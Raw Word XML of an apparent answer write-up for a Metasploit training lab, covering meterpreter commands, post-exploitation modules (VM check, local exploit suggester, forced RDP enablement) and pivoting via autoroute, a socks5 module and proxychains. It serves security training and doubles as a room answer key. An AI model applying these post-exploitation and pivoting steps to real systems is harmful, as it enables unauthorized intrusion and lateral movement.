          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67101468" wp14:editId="69C4BFAD">
            <wp:extent cx="3893152" cy="2189066"/>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6507" cy="2196575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4028616A" w14:textId="613E3950" w:rsidR="00E07C87" w:rsidRPr="000F1247"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Let's go ahead and figure out the privileges of our current user, what command do we run?</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000F1247">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Getprivs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B29A8E6" w14:textId="70563F1C" w:rsidR="000F1247" w:rsidRPr="006F1554" w:rsidRDefault="000F1247" w:rsidP="000F1247">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320F0B2A" wp14:editId="6268A87B">
            <wp:extent cx="4656766" cy="261843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5663" cy="2623439"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4230C304" w14:textId="042DC9C5" w:rsidR="00E07C87" w:rsidRPr="006F1554"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What command do we run to transfer files to our victim computer?</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000F1247">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8678E4" w14:textId="5C89521B" w:rsidR="00E07C87" w:rsidRPr="006F1554"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How about if we want to run a Metasploit module?</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000F1247">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A581FE" w14:textId="641461FB" w:rsidR="00E07C87" w:rsidRPr="000F1247"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A simple question but still quite necessary, what command do we run to figure out the networking information and interfaces on our victim?</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000F1247">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFFB837" w14:textId="09F4F521" w:rsidR="000F1247" w:rsidRPr="006F1554" w:rsidRDefault="000F1247" w:rsidP="000F1247">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="720381E9" wp14:editId="227C29D3">
            <wp:extent cx="4543639" cy="25548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56510" cy="2562063"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B861615" w14:textId="297995A7" w:rsidR="00E07C87" w:rsidRPr="000F1247" w:rsidRDefault="00E07C87"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Let's go ahead and run a few post modules from Metasploit. First, let's run the command run </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>post/windows/gather/checkvm</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. This will determine if we're in a VM, a very useful piece of knowledge for further pivoting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386EEABB" w14:textId="26CF9D71" w:rsidR="000F1247" w:rsidRPr="000F1247" w:rsidRDefault="000F1247" w:rsidP="000F1247">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1ED017A9" wp14:editId="33B0F19D">
            <wp:extent cx="3935575" cy="221292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6110" cy="2218844"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="650FC807" w14:textId="77777777" w:rsidR="000F1247" w:rsidRPr="006F1554" w:rsidRDefault="000F1247" w:rsidP="000F1247">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A0909DE" w14:textId="2631DF31" w:rsidR="002A4C4B" w:rsidRPr="000F1247" w:rsidRDefault="002A4C4B" w:rsidP="00F01BCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Next, let's try: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>run post/multi/recon/local_exploit_suggester</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. This will check for various exploits which we can run within our session to elevate our privileges. Feel free to experiment using these suggestions, however, we'll be going through this in greater detail in the room </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="006F1554">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="007BFF"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>Ice</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624C1565" w14:textId="3765185B" w:rsidR="000F1247" w:rsidRPr="006F1554" w:rsidRDefault="000F1247" w:rsidP="000F1247">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="043A73B9" wp14:editId="294DA1D8">
            <wp:extent cx="4430511" cy="2491216"/>
            <wp:effectExtent l="0" t="0" r="825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9349" cy="2496185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7591B63C" w14:textId="2246A187" w:rsidR="002A4C4B" w:rsidRPr="000F1247" w:rsidRDefault="002A4C4B" w:rsidP="002A4C4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:color w:val="212529"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Finally, let's try forcing RDP to be available. This won't work since we aren't administrators, however, this is a fun command to know about: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>run post/windows/manage/enable_rdp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAF8B84" w14:textId="51BE1C12" w:rsidR="000F1247" w:rsidRPr="006F1554" w:rsidRDefault="000F1247" w:rsidP="000F1247">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2734D3EB" wp14:editId="3F07FF00">
            <wp:extent cx="4402229" cy="24753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1378" cy="2480457"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0BC1FB" w14:textId="16FE8430" w:rsidR="002A4C4B" w:rsidRPr="000F1247" w:rsidRDefault="002A4C4B" w:rsidP="002A4C4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:color w:val="212529"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:color w:val="212529"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>One quick extra question, what command can we run in our meterpreter session to spawn a normal system shell? </w:t>
      </w:r>
      <w:r w:rsidR="000F1247" w:rsidRPr="000F1247">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="000F1247">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBABFBB" w14:textId="08863DD0" w:rsidR="000F1247" w:rsidRPr="006F1554" w:rsidRDefault="000F1247" w:rsidP="000F1247">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="212529"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A2FC0F6" wp14:editId="53D3199C">
            <wp:extent cx="4357314" cy="2450058"/>
            <wp:effectExtent l="0" t="0" r="571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83677" cy="2464881"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD8AA5D" w14:textId="43D4D05E" w:rsidR="002A4C4B" w:rsidRPr="006F1554" w:rsidRDefault="006F1554" w:rsidP="002A4C4B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Task 7:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564A7C04" w14:textId="3DCE8288" w:rsidR="006F1554" w:rsidRPr="002951A8" w:rsidRDefault="006F1554" w:rsidP="006F1554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Let's go ahead and run the command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>run autoroute -h</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, this will pull up the help menu for autoroute. What command do we run to add a route to the following subnet: 172.18.1.0/24? Use the </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>-n</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> flag in your answer.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002951A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>run autoroute -s 172.18.1.0 -n 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36727FE3" w14:textId="3F2ED399" w:rsidR="002951A8" w:rsidRPr="002951A8" w:rsidRDefault="002951A8" w:rsidP="002951A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D89D6AD" wp14:editId="298D25FC">
            <wp:extent cx="4345665" cy="24435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56094" cy="2449372"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA99462" w14:textId="26F6FA3B" w:rsidR="006F1554" w:rsidRPr="002951A8" w:rsidRDefault="006F1554" w:rsidP="006F1554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Additionally, we can start a socks5 proxy server out of this session. Background our current meterpreter session and run the command </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>search server/socks5</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. What is the full path to the socks5 auxiliary module?</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002951A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>auxiliary/server/socks5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEA806C" w14:textId="40EC3218" w:rsidR="002951A8" w:rsidRPr="006F1554" w:rsidRDefault="002951A8" w:rsidP="002951A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="357AACD3" wp14:editId="7A285B15">
            <wp:extent cx="4952943" cy="278497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66513" cy="2792602"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FAEC92" w14:textId="638D269E" w:rsidR="006F1554" w:rsidRPr="002951A8" w:rsidRDefault="006F1554" w:rsidP="006F1554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Once we've started a socks server we can modify our </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/etc/proxychains.conf</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> file to include our new server. What command do we prefix our commands (outside of Metasploit) to run them through our socks5 server with proxychains?</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002951A8" w:rsidRPr="002951A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="002951A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>roxychains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1C7E05" w14:textId="29EC1A6B" w:rsidR="002951A8" w:rsidRDefault="002951A8" w:rsidP="002951A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13A69D43" wp14:editId="5A0E129F">
            <wp:extent cx="4203567" cy="2363608"/>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8741" cy="2372140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
